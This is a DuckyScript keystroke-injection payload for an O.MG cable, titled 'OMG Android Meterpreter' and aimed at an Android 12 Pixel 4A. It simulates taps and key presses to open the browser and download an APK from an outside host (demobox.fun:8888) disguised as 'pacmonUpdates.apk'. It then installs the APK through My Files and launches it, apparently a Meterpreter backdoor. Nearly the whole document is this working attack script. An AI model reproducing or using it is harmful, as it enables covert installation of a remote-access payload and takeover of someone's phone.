REM # Android 12 Pixel 4A 
REM # -----------------------------------------------------------
REM # Title: OMG Android Meterpreter
REM # Description: Download and install an APK on Android. 
REM # Alt payload approach of moving around the GUI with less tabs
REM # Timing is very tight, you probably want to increase the delays
REM # 
REM # Author: based from @_MG _  modified by @TestmanJ
REM # Target: Android 12
REM # Notes: Set URL for APK payload below
REM # -----------------------------------------------------------

REM # -----------------------------------------------------------
REM # clear screen (Not needed, but helps for demos)
REM # -----------------------------------------------------------

GUI ENTER
DELAY 1000
GUI ENTER
DELAY 1000

REM # -----------------------------------------------------------
REM # launch browser and download apk
REM # -----------------------------------------------------------

# need to close all windows

GUI b
DELAY 5000
CTRL l
DELAY 2000
STRING http://demobox.fun:8888/pacmonUpdates.apk
DELAY 2000
ENTER
DELAY 2000

REM # -----------------------------------------------------------
REM # open apk with My Files
REM # -----------------------------------------------------------

REM # open My Files
GUI ENTER
DELAY 1000
GUI ENTER
DELAY 1000

CTRL a
DELAY 1000
TAB
DELAY 50
TAB
DELAY 50

STRING Fil
DELAY 50
TAB
TAB
ENTER
DELAY 8000

REM # open Downloads
DOWN
DOWN 
ENTER
DELAY 4000

REM # Install
ENTER
DELAY 1000
TAB
ENTER
DELAY 1000
TAB
ENTER
DELAY 2000

REM # Run it!
GUI ENTER
DELAY 1000
GUI ENTER
DELAY 1000

CTRL a
DELAY 1000
UP
UP
UP
UP
UP
UP
TAB
STRING MainAct
TAB
TAB
ENTER
DELAY 1000
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
ENTER
DELAY 1000
ENTER

GUI ENTER
DELAY 1000
GUI ENTER
DELAY 1000
